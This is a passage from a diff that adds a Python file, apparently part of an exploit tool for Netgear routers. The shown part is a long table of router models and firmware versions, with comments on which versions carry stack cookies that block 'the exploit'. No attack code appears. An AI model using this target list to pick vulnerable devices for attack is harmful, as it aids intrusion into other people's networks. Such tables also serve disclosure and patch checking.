"1.0.1.50" : "update_file", + "1.0.1.54" : "update_file", + }, +} + +# A mapping of human friendly versions to the versions returned by currentsetting.htm +firmware_version_to_human_version = { + "AC1450" : { + "V1.0.0.36_10.0.17" : "1.0.0.36", + "V1.0.0.34_10.0.16" : "1.0.0.34", + "V1.0.0.22_1.0.10" : "1.0.0.22", + "V1.0.0.14_1.0.6" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.6_1.0.3" : "1.0.0.6", + }, + "D6220" : { + "V1.0.0.52_1.0.52" : "1.0.0.52", + "V1.0.0.48_1.0.48" : "1.0.0.48", + "V1.0.0.46_1.0.46" : "1.0.0.46", + "V1.0.0.44_1.0.44" : "1.0.0.44", + "V1.0.0.40_1.0.40" : "1.0.0.40", + "V1.0.0.36_1.0.36" : "1.0.0.36", + "V1.0.0.34_1.0.34" : "1.0.0.34", + "V1.0.0.32_1.0.32" : "1.0.0.32", + "V1.0.0.28_1.0.28" : "1.0.0.28", + "V1.0.0.24_1.0.24" : "1.0.0.24", + "V1.0.0.22_1.0.22" : "1.0.0.22", + "V1.0.0.16_1.0.16" : "1.0.0.16", + }, + "D6300" : { + "V1.0.0.102_1.0.102" : "1.0.0.102", + "V1.0.0.96_1.1.96" : "1.0.0.96", + "V1.0.0.90_1.0.90" : "1.0.0.90", + "V1.0.0.88-1.0.88" : "1.0.0.88", + "V1.0.0.76_1.0.76" : "1.0.0.76", + "V1.0.0.72_1.0.72" : "1.0.0.72", + "V1.0.0.42_1.0.42" : "1.0.0.42", + "V1.0.0.30_1.0.30" : "1.0.0.30", + "V1.0.0.24_1.0.24" : "1.0.0.24", + "V1.0.0.16_1.0.16" : "1.0.0.16", + }, + "D6400" : { + "V1.0.0.88_1.0.88" : "1.0.0.88", + "V1.0.0.86_1.0.86" : "1.0.0.86", + "V1.0.0.82_1.0.82" : "1.0.0.82", + "V1.0.0.80_1.0.80" : "1.0.0.80", + "V1.0.0.78_1.0.78" : "1.0.0.78", + "V1.0.0.74_1.0.74" : "1.0.0.74", + "V1.0.0.70_1.0.70" : "1.0.0.70", + "V1.0.0.68_1.0.68" : "1.0.0.68", + "V1.0.0.66_1.0.66" : "1.0.0.66", + "V1.0.0.60_1.0.60" : "1.0.0.60", + "V1.0.0.58_1.0.58" : "1.0.0.58", + "V1.0.0.56_1.0.56" : "1.0.0.56", + "V1.0.0.54_1.0.54" : "1.0.0.54", + "V1.0.0.52_1.0.52" : "1.0.0.52", + "V1.0.0.44_1.0.44" : "1.0.0.44", + "V1.0.0.38_1.1.38" : "1.0.0.38", + "V1.0.0.34_1.3.34" : "1.0.0.34", + "V1.0.0.22_1.0.22" : "1.0.0.22", + }, + "D7000V2" : { + "V1.0.0.56_1.0.1" : "1.0.0.56", + "V1.0.0.53_1.0.2" : "1.0.0.53", + "V1.0.0.52_1.0.1" : "1.0.0.52", + "V1.0.0.51_1.0.1" : "1.0.0.51", + "V1.0.0.47_1.0.1" : "1.0.0.47", + "V1.0.0.45_1.0.1" : "1.0.0.45", + "V1.0.0.44_1.0.1" : "1.0.0.44", + "V1.0.0.40_1.0.1" : "1.0.0.40", + "V1.0.0.38_1.0.1" : "1.0.0.38", + }, + "D8500" : { + # Version 1.0.3.29 has stack cookies which will block the + # exploit. However, Netgear stopped using stack cookies + # after this version. + "V1.0.3.44_1.0.1" : "1.0.3.44", + "V1.0.3.43_1.0.1" : "1.0.3.43", + "V1.0.3.42_1.0.1" : "1.0.3.42", + "V1.0.3.39_1.0.1" : "1.0.3.39", + "V1.0.3.36_1.0.1" : "1.0.3.36", + "V1.0.3.35_1.0.1" : "1.0.3.35", + "V1.0.3.28_1.0.1" : "1.0.3.28", + "V1.0.3.27_1.0.1" : "1.0.3.27", + "V1.0.3.25_1.0.1" : "1.0.3.25", + }, + "DC112A" : { + "V1.0.0.44_1.0.60" : "1.0.0.44", + "V1.0.0.30_1.0.60" : "1.0.0.30", + "V1.0.0.24_1.0.60" : "1.0.0.24", + }, + "DGN2200" : { + "V1.0.0.58_7.0.57" : "1.0.0.58", + "V1.0.0.57_7.0.57" : "1.0.0.57", + "V1.0.0.55_7.0.55" : "1.0.0.55", + "V1.0.0.52_7.0.52" : "1.0.0.52", + "V1.0.0.50_7.0.50NA" : "1.0.0.50NA", + "V1.0.0.36_7.0.36NA" : "1.0.0.36NA", + "V1.0.0.36_7.0.36" : "1.0.0.36", + }, + "DGN2200M" : { + "V1.0.0.37_1.0.21WW" : "1.0.0.37", + "V1.0.0.35_1.0.21WW" : "1.0.0.35", + "V1.0.0.35_1.0.21NA" : "1.0.0.35NA", + "V1.0.0.33_1.0.21WW" : "1.0.0.33", + "V1.0.0.33_1.0.21NA" : "1.0.0.33NA", + "V1.0.0.26_1.0.20WW" : "1.0.0.26", + "V1.0.0.24_1.0.20NA" : "1.0.0.24NA", + }, + "DGN2200V4" : { + "V1.0.0.110_1.0.110" : "1.0.0.110", + "V1.0.0.108_1.0.108" : "1.0.0.108", + "V1.0.0.102_1.0.102" : "1.0.0.102", + "V1.0.0.98_1.0.98" : "1.0.0.98", + "V1.0.0.90_1.0.90" : "1.0.0.90", + "V1.0.0.86_1.0.86" : "1.0.0.86", + "V1.0.0.82_1.0.82" : "1.0.0.82", + "V1.0.0.76_1.0.76" : "1.0.0.76", + "V1.0.0.66_1.0.66" : "1.0.0.66", + "V1.0.0.62_1.0.62" : "1.0.0.62", + "V1.0.0.58_1.0.58" : "1.0.0.58", + "V1.0.0.46_1.0.46" : "1.0.0.46", + "V1.0.0.24_5.0.8" : "1.0.0.24", + "V1.0.0.5_5.0.3" : "1.0.0.5", + }, + "DGND3700" : { + "V1.0.0.17_1.0.17" : "1.0.0.17", + "V1.0.0.17_1.0.17NA" : "1.0.0.17NA", + "V1.0.0.12_1.0.12" : "1.0.0.12", + "V1.0.0.12_1.0.12NA" : "1.0.0.12NA", + }, + "EX3700" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + "V1.0.0.24_1.0.18" : "1.0.0.24", + "V1.0.0.22_1.0.17" : "1.0.0.22", + }, + "EX3800" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + }, + "EX3920" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + }, + "EX6000" : { + "V1.0.0.38_1.0.22" : "1.0.0.38", + "V1.0.0.32_1.0.18" : "1.0.0.32", + "V1.0.0.30_1.0.17" : "1.0.0.30", + "V1.0.0.28_1.0.16" : "1.0.0.28", + "V1.0.0.24_1.0.14" : "1.0.0.24", + "V1.0.0.20_1.0.11" : "1.0.0.20", + "V1.0.0.10_1.0.6" : "1.0.0.10", + }, + "EX6100" : { + "V1.0.2.24_1.1.134" : "1.0.2.24", + "V1.0.2.18_1.1.131" : "1.0.2.18", + "V1.0.2.16_1.1.130" : "1.0.2.16", + "V1.0.2.6_1.1.120" : "1.0.2.6", + "V1.0.1.36_1.0.114" : "1.0.1.36", + "V1.0.0.28_1.0.66" : "1.0.0.28", + "V1.0.0.22_1.0.51" : "1.0.0.22", + }, + "EX6120" : { + "V1.0.0.48_1.0.30" : "1.0.0.48", + "V1.0.0.46_1.0.29" : "1.0.0.46", + "V1.0.0.42_1.0.27" : "1.0.0.42", + "V1.0.0.40_1.0.25" : "1.0.0.40", + "V1.0.0.36_1.0.23" : "1.0.0.36", + "V1.0.0.32_1.0.21" : "1.0.0.32", + "V1.0.0.30_1.0.20" : "1.0.0.30", + "V1.0.0.28_1.0.18" : "1.0.0.28", + "V1.0.0.26_1.0.16" : "1.0.0.26", + "V1.0.0.16_1.0.11" : "1.0.0.16", + "V1.0.0.14_1.0.10" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.4_1.0.2" : "1.0.0.4", + }, + "EX6130" : { + "V1.0.0.30_1.0.17" : "1.0.0.30", + "V1.0.0.28_1.0.16" : "1.0.0.28", + "V1.0.0.24_1.0.14" : "1.0.0.24", + "V1.0.0.22_1.0.13" : "1.0.0.22", + "V1.0.0.20_1.0.12" : "1.0.0.20", + "V1.0.0.16_1.0.10" : "1.0.0.16", + "V1.0.0.12_1.0.7" : "1.0.0.12", + }, + "EX6150" : { + "V1.0.0.42_1.0.73" : "1.0.0.42", + "V1.0.0.34_1.0.69" : "1.0.0.34", + "V1.0.0.32_1.0.68" : "1.0.0.32", + "V1.0.0.28_1.0.64" : "1.0.0.28", + "V1.0.0.16_1.0.58" : "1.0.0.16", + "V1.0.0.14_1.0.54" : "1.0.0.14", + }, + "EX6200" : { + "V1.0.3.90_1.1.125" : "1.0.3.90", + "V1.0.3.88_1.1.123" : "1.0.3.88", + "V1.0.3.82_1.1.117" : "1.0.3.82", + "V1.0.3.76_1.1.111" : "1.0.3.76", + "V1.0.3.74_1.1.109" : "1.0.3.74", + "V1.0.3.68_1.1.104" : "1.0.3.68", + "V1.0.1.60_1.1.98" : "1.0.1.60", + "V1.0.0.52_1.1.90" : "1.0.0.52", + "V1.0.0.46_1.1.70" : "1.0.0.46", + "V1.0.0.42_1.1.57" : "1.0.0.42", + "V1.0.0.38_1.1.52" : "1.0.0.38", + }, + "EX6920" : { + "V1.0.0.40_1.0.25" : "1.0.0.40", + "V1.0.0.36_1.0.23" : "1.0.0.36", + "V1.0.0.32_1.0.21" : "1.0.0.32", + "V1.0.0.30_1.0.20" : "1.0.0.30", + "V1.0.0.28_1.0.18" : "1.0.0.28", + "V1.0.0.26_1.0.16" : "1.0.0.26", + "V1.0.0.16_1.0.11" : "1.0.0.16", + "V1.0.0.14_1.0.10" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.4_1.0.2" : "1.0.0.4", + }, + "EX7000" : { + "V1.0.1.84_1.0.148" : "1.0.1.84", + "V1.0.1.80_1.0.144" : "1.0.1.80", + "V1.0.1.78_1.0.140" : "1.0.1.78", + "V1.0.0.66_1.0.126" : "1.0.0.66", + "V1.0.0.62_1.0.122" : "1.0.0.62", + "V1.0.0.58_1.0.112" : "1.0.0.58", + "V1.0.0.56_1.0.108" : "1.0.0.56", + "V1.0.0.50_1.0.102" : "1.0.0.50", + "V1.0.0.42_1.0.94" : "1.0.0.42", + "V1.0.0.38_1.0.91" : "1.0.0.38", + "V1.0.0.36_1.0.88" : "1.0.0.36", + "V1.0.0.32_1.0.84" : "1.0.0.32", + "V1.0.0.30_1.0.72" : "1.0.0.30", + }, + "LG2200D" : { + "V1.0.0.57_1.0.40" : "1.0.0.57", + }, + "MBM621" : { + "V1.1.3" : "1.1.3", + }, + "MBR624GU" : { + "V6.01.30.64WW" : "6.1.30.64", + "V6.01.30.61WW" : "6.1.30.61", + "V6.01.30.59WW" : "6.1.30.59", + "V6.01.30.59NA" : "6.1.30.59NA", + "V6.00.30.46WW" : "6.0.30.46", + "V6.00.28.43WW" : "6.0.28.43", + "V6.00.28.43NA" : "6.0.28.43NA", + "V6.00.26.21WW" : "6.0.26.21", + "V6.00.22.14NA" : "6.0.22.14NA", + "V6.00.22.12" : "6.0.22.12", + }, + "MBR1200" : { + "V1.2.2.53" : "1.2.2.53", + }, + "MBR1515" : { + "V1.2.2.68" : "1.2.2.68", + }, + "MBR1516" : { + "V1.2.2.84BM" : "1.2.2.84BM", + }, + "MBRN3000" : { + "V1.0.0.74_2.0.12WW" : "1.0.0.74", + "V1.0.0.72_2.0.12WW" : "1.0.0.72", + "V1.0.0.72_2.0.12NA" : "1.0.0.72NA", + "V1.0.0.69_2.0.12WW" : "1.0.0.69", + "V1.0.0.69_2.0.12NA" : "1.0.0.69NA", + "V1.0.0.65_2.0.12WW" : "1.0.0.65", + "V1.0.0.65_2.0.12NA" : "1.0.0.65NA", + "V1.0.0.43NA" : "1.0.0.43NA", + }, + "MVBR1210C" : { + "V1.2.0.35BM" : "1.2.0.35", + }, + "R4500" : { + "V1.0.0.4_1.0.3" : "1.0.0.4", + }, + "R6200" : { + "V1.0.1.58_1.0.44" : "1.0.1.58", + "V1.0.1.56_1.0.43" : "1.0.1.56", + "V1.0.1.52_1.0.41" : "1.0.1.52", + "V1.0.1.48_1.0.37" : "1.0.1.48", + "V1.0.1.46_1.0.36" : "1.0.1.46", + "V1.0.0.28_1.0.24" : "1.0.0.28", + "V1.0.0.18_1.0.18" : "1.0.0.18", + }, + "R6200V2" : { + "V1.0.3.12_10.1.11" : "1.0.3.12", + "V1.0.3.10_10.1.10" : "1.0.3.10", + "V1.0.1.20_1.0.18" : "1.0.1.20", + "V1.0.1.18_1.0.17" : "1.0.1.18", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + }, + "R6250" : { + "V1.0.4.38_10.1.30" : "1.0.4.38", + "V1.0.4.36_10.1.30" : "1.0.4.36", + "V1.0.4.34_10.1.28" : "1.0.4.34", + "V1.0.4.26_10.1.23" : "1.0.4.26", + "V1.0.4.20_10.1.20" : "1.0.4.20", + "V1.0.4.16_10.1.18" : "1.0.4.16", + "V1.0.4.14_10.1.17" : "1.0.4.14", + "V1.0.4.12_10.1.15" : "1.0.4.12", + "V1.0.4.8_10.1.13" : "1.0.4.08", + "V1.0.4.6_10.1.12" : "1.0.4.06", + "V1.0.4.2_10.1.10" : "1.0.4.02", + "V1.0.3.12_10.1.8" : "1.0.3.12", + "V1.0.3.6_10.1.3" : "1.0.3.06", + "V1.0.1.84_1.0.78" : "1.0.1.84", + "V1.0.1.82_1.0.77" : "1.0.1.82", + "V1.0.1.80_1.0.75" : "1.0.1.80", + "V1.0.0.72_1.0.71" : "1.0.0.72", + "V1.0.0.70_1.0.70" : "1.0.0.70", + "V1.0.0.62_1.0.62" : "1.0.0.62", + }, + "R6300" : { + "V1.0.2.80_1.0.59" : "1.0.2.80", + "V1.0.2.78_1.0.58" : "1.0.2.78", + "V1.0.2.76_1.0.57" : "1.0.2.76", + "V1.0.2.70_1.0.50" : "1.0.2.70", + "V1.0.2.68_1.0.49" : "1.0.2.68", + "V1.0.2.38_1.0.33" : "1.0.2.38", + "V1.0.2.36_1.0.28" : "1.0.2.36", + "V1.0.2.26_1.0.26" : "1.0.2.26", + "V1.0.2.14_1.0.23" : "1.0.2.14", + "V1.0.2.10_1.0.21" : "1.0.2.10", + "V1.0.0.90_1.0.18" : "1.0.0.90", + "V1.0.0.68_1.0.16" : "1.0.0.68", + }, + "R6300V2" : { + # Versions 1.0.4.12, 1.0.4.18, and 1.0.4.20 all have stack + # cookies which will block the exploit. However, Netgear + # stopped using stack cookies again in version 1.0.4.24 + "V1.0.4.36_10.0.93" : "1.0.4.36", + "V1.0.4.34_10.0.92" : "1.0.4.34", + "V1.0.4.32_10.0.91" : "1.0.4.32", + "V1.0.4.28_10.0.89" : "1.0.4.28", + "V1.0.4.24_10.0.87" : "1.0.4.24", + "V1.0.4.8_10.0.77" : "1.0.4.8", + "V1.0.4.6_10.0.76" : "1.0.4.6", + "V1.0.4.2_10.0.74" : "1.0.4.2", + "V1.0.3.30_10.0.73" : "1.0.3.30", + "V1.0.3.28_10.0.71" : "1.0.3.28", + "V1.0.3.26_10.0.70" : "1.0.3.26", + "V1.0.3.22_10.0.67" : "1.0.3.22", + "V1.0.3.8_1.0.60" : "1.0.3.8", + "V1.0.3.6_1.0.63CH" : "1.0.3.6CH", + "V1.0.3.2_1.0.57" : "1.0.3.2", + "V1.0.2.86_1.0.51" : "1.0.2.86", + "V1.0.2.72_1.0.46" : "1.0.2.72", + "V1.0.1.72_1.0.21" : "1.0.1.72", + }, + "R6400" : { + "V1.0.1.52_1.0.36" : "1.0.1.52", + "V1.0.1.50_1.0.35" : "1.0.1.50", + "V1.0.1.46_1.0.32" : "1.0.1.46", + "V1.0.1.44_1.0.31" : "1.0.1.44", + "V1.0.1.42_1.0.28" : "1.0.1.42", + "V1.0.1.36_1.0.25" : "1.0.1.36", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.26_1.0.19" : "1.0.1.26", + "V1.0.1.24_1.0.18" : "1.0.1.24", + "V1.0.1.22_1.0.17" : "1.0.1.22", + "V1.0.1.20_1.0.16" : "1.0.1.20", + "V1.0.1.18_1.0.15" : "1.0.1.18", + "V1.0.1.12_1.0.11" : "1.0.1.12", + "V1.0.1.6_1.0.4" : "1.0.1.6", + "V1.0.0.26_1.0.14" : "1.0.0.26", + "V1.0.0.24_1.0.13" : "1.0.0.24", + "V1.0.0.20_1.0.11" : "1.0.0.20", + "V1.0.0.14_1.0.8" : "1.0.0.14", + }, + "R6400V2" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + "V1.0.2.50_1.0.38" : "1.0.2.50", + "V1.0.2.46_1.0.36" : "1.0.2.46", + "V1.0.2.44_1.0.35" : "1.0.2.44", + "V1.0.2.34_1.0.22" : "1.0.2.34", + "V1.0.2.32_1.0.20" : "1.0.2.32", + "V1.0.2.14_1.0.7" : "1.0.2.14", + }, + "R6700" : { + "V1.0.2.8_10.0.53" : "1.0.2.8", + "V1.0.2.6_10.0.52" : "1.0.2.6", + "V1.0.1.48_10.0.46" : "1.0.1.48", + "V1.0.1.46_10.0.45" : "1.0.1.46", + "V1.0.1.44_10.0.44" : "1.0.1.44", + "V1.0.1.36_10.0.40" : "1.0.1.36", + "V1.0.1.32_10.0.38" : "1.0.1.32", + "V1.0.1.26_10.0.35" : "1.0.1.26", + "V1.0.1.22_10.0.33" : "1.0.1.22", + "V1.0.1.20_10.0.32" : "1.0.1.20", + "V1.0.1.16_10.0.30" : "1.0.1.16", + "V1.0.1.14_10.0.29" : "1.0.1.14", + "V1.0.0.26_10.0.26" : "1.0.0.26", + "V1.0.0.24_10.0.18" : "1.0.0.24", + "V1.0.0.2_1.0.1" : "1.0.0.2", + }, + "R6700V3" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + }, + "R6900" : { + "V1.0.2.8_10.0.38" : "1.0.2.8", + "V1.0.2.6_10.0.37" : "1.0.2.6", + "V1.0.2.4_10.0.35" : "1.0.2.4", + "V1.0.1.48_10.0.30" : "1.0.1.48", + "V1.0.1.46_10.0.29" : "1.0.1.46", + "V1.0.1.44_10.0.28" : "1.0.1.44", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.28_1.0.21" : "1.0.1.28", + "V1.0.1.26_1.0.20" : "1.0.1.26", + "V1.0.1.22_1.0.18" : "1.0.1.22", + "V1.0.1.20_1.0.17" : "1.0.1.20", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + "V1.0.0.4_1.0.10" : "1.0.0.4", + "V1.0.0.2_1.0.2" : "1.0.0.2", + }, + "R6900P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.46_1.0.30" : "1.0.0.46", + }, + "R7000" : { + "V1.0.0.96_1.0.15" : "0.96", + "V1.0.1.22_1.0.15" : "1.22", + "V1.0.2.164_1.0.15" : "2.16", + "V1.0.2.194_1.0.15" : "2.19", + "V1.0.3.24_1.1.20" : "3.24", + "V1.0.3.56_1.1.25" : "3.56", + "V1.0.3.60_1.1.27" : "3.60", + "V1.0.3.68_1.1.31" : "3.68", + "V1.0.3.80_1.1.38" : "3.80", + "V1.0.4.18_1.1.52" : "4.18", + "V1.0.4.28_1.1.64" : "4.28", + "V1.0.4.30_1.1.67" : "4.30", + "V1.0.5.64_1.1.88" : "5.64", + "V1.0.5.70_1.1.91" : "5.70", + "V1.0.7.2_1.1.93" : "7.2", + "V1.0.7.6_1.1.99" : "7.6", + "V1.0.7.10_1.2.3" : "7.10", + "V1.0.7.12_1.2.5" : "7.12", + "V1.0.8.34_1.2.15" : "8.34", + "V1.0.9.6_1.2.19" : "9.6", + "V1.0.9.10_1.2.21" : "9.10", + "V1.0.9.12_1.2.23" : "9.12", + "V1.0.9.14_1.2.25" : "9.14", + "V1.0.9.18_1.2.27" : "9.18", + "V1.0.9.26_10.2.31" : "9.26", + "V1.0.9.28_10.2.32" : "9.28", + "V1.0.9.32_10.2.34" : "9.32", + "V1.0.9.34_10.2.36" : "9.34", + "V1.0.9.42_10.2.44" : "9.42", + "V1.0.9.60_10.2.60" : "9.60", + "V1.0.9.64_10.2.64" : "9.64", + "V1.0.9.88_10.2.88" : "9.88", + "V1.0.11.100_10.2.100" : "11.100", + }, + "R7000P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.56_1.0.45" : "1.0.0.56", + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.30" : "1.0.0.46", + "V1.0.0.44_1.0.27" : "1.0.0.44", + }, + "R7100LG" : { + "V1.0.0.52_1.0.6" : "1.0.0.52", + "V1.0.0.50_1.0.6" : "1.0.0.50", + "V1.0.0.48_1.0.6" : "1.0.0.48", + "V1.0.0.46_1.0.6" : "1.0.0.46", + "V1.0.0.42_1.0.6" : "1.0.0.42", + "V1.0.0.40_1.0.6" : "1.0.0.40", + "V1.0.0.38_1.0.6" : "1.0.0.38", + "V1.0.0.36_1.0.6" : "1.0.0.36", + "V1.0.0.34_1.0.6" : "1.0.0.34", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.30_1.0.6" : "1.0.0.30", + "V1.0.0.28_1.0.6" : "1.0.0.28", + "V1.0.0.24_1.0.6" : "1.0.0.24", + }, + "R7300" : { + "V1.0.0.74_1.0.29" : "1.0.0.74", + "V1.0.0.70_1.0.25" : "1.0.0.70", + "V1.0.0.68_1.0.24" : "1.0.0.68", + "V1.0.0.62_1.0.21" : "1.0.0.62", + "V1.0.0.60_1.0.20" : "1.0.0.60", + "V1.0.0.56_1.0.18" : "1.0.0.56", + "V1.0.0.54_1.0.17" : "1.0.0.54", + "V1.0.0.52_1.0.16" : "1.0.0.52", + "V1.0.0.46_1.0.13" : "1.0.0.46", + "V1.0.0.44_1.0.12" : "1.0.0.44", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.26_1.0.6" : "1.0.0.26", + }, + "R7850" : { + "V1.0.5.48_10.0.42" : "1.0.5.48", + "V1.0.4.46_10.0.22" : "1.0.4.46", + "V1.0.4.42_10.0.12" : "1.0.4.42", + }, + "R7900" : { + "V1.0.4.22_10.0.44" : "1.0.4.22", + "V1.0.3.18_10.0.42" : "1.0.3.18", + "V1.0.3.10_10.0.38" : "1.0.3.10", + "V1.0.3.8_10.0.37" : "1.0.3.8", + "V1.0.2.16_10.0.32" : "1.0.2.16", + "V1.0.2.10_10.0.29" : "1.0.2.10", + "V1.0.1.26_10.0.23" : "1.0.1.26", + "V1.0.1.18_10.0.20" : "1.0.1.18", + "V1.0.1.12_10.0.17" : "1.0.1.12", + "V1.0.1.8_10.0.14" : "1.0.1.8", + "V1.0.1.4_10.0.12" : "1.0.1.4", + "V1.0.0.10_10.0.7" : "1.0.0.10", + "V1.0.0.8_10.0.5" : "1.0.0.8", + "V1.0.0.6_10.0.4" : "1.0.0.6", + "V1.0.0.2_10.0.1" : "1.0.0.2", + }, + "R8000" : { + "V1.0.4.46_10.1.63" : "1.0.4.46", + "V1.0.4.28_10.1.54" : "1.0.4.28", + "V1.0.4.18_10.1.49" : "1.0.4.18", + "V1.0.4.12_10.1.46" : "1.0.4.12", + "V1.0.4.4_1.1.42" : "1.0.4.4", + "V1.0.4.2_1.1.41" : "1.0.4.2", + "V1.0.3.54_1.1.37" : "1.0.3.54", + "V1.0.3.48_1.1.33" : "1.0.3.48", + "V1.0.3.46_1.1.32" : "1.0.3.46", + "V1.0.3.36_1.1.25" : "1.0.3.36", + "V1.0.3.32_1.1.21" : "1.0.3.32", + "V1.0.3.26_1.1.18" : "1.0.3.26", + "V1.0.3.4_1.1.2" : "1.0.3.4", + "V1.0.2.46_1.0.97" : "1.0.2.46", + "V1.0.2.44_1.0.96" : "1.0.2.44", + "V1.0.1.16_1.0.74" : "1.0.1.16", + "V1.0.0.110_1.0.70" : "1.0.0.110", + "V1.0.0.108_1.0.62" : "1.0.0.108", + "V1.0.0.102_1.0.45" : "1.0.0.102", + "V1.0.0.100_1.0.44" : "1.0.0.100", + "V1.0.0.90_1.0.39" : "1.0.0.90", + "V1.0.0.76_1.0.32" : "1.0.0.76", + "V1.0.0.74_1.0.31" : "1.0.0.74", + "V1.0.0.68_1.0.27" : "1.0.0.68", + "V1.0.0.46_1.0.17" : "1.0.0.46", + }, + "R8300" : { + # These version strings may be slightly off. Versions 1.0.2.128 and 1.0.2.130 only used + # the short versions, rather than the full version string like other models. + "V1.0.2.130" : "1.0.2.130", + "V1.0.2.128" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.48_1.0.52" : "1.0.2.48", + }, + "R8500" : { + "V1.0.2.130_1.0.99" : "1.0.2.130", + "V1.0.2.128_1.0.97" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.64_1.0.62" : "1.0.2.64", + "V1.0.2.54_1.0.56" : "1.0.2.54", + "V1.0.2.30_1.0.43" : "1.0.2.30", + "V1.0.2.26_1.0.41" : "1.0.2.26", + "V1.0.0.56_1.0.28" : "1.0.0.56", + "V1.0.0.52_1.0.26" : "1.0.0.52", + "V1.0.0.42_1.0.23" : "1.0.0.42", + "V1.0.0.28_1.0.15" : "1.0.0.28", + }, + "RS400" : { + 